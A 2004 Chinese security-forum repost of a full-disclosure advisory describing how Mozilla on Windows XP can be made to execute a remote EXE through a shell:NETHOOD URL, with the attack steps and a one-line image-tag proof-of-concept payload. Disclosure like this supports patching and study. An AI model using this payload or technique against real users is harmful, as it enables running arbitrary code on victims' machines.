[转载]SHELL can execute remote EXE program

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6831
精华: 834
积分: 36069
阅读权限: 255
性别: 男
来自: 中国
在线时间: 599 小时
注册时间: 2004-6-25
最后登录: 2008-12-3

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-7-13 03:19 只看该作者

[转载]SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu <liudieyu@umbrella.name>
　　　　　　　　　　　　　　　　　　#
[START] Advisory

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"

At last, make MOZILLA request the following URL:

shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A file named "fileid.exe" in the "shared" folder will be executed.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

liudieyu
http://umbrella.name

　　　　　　　　　　　　#
[START] PROOF OF CONCEPT
　　　　　　　　　　###


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

http://seclists.org/lists/fulldisclosure/2004/Jul/0425.html

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » [转载]SHELL can execute remote EXE program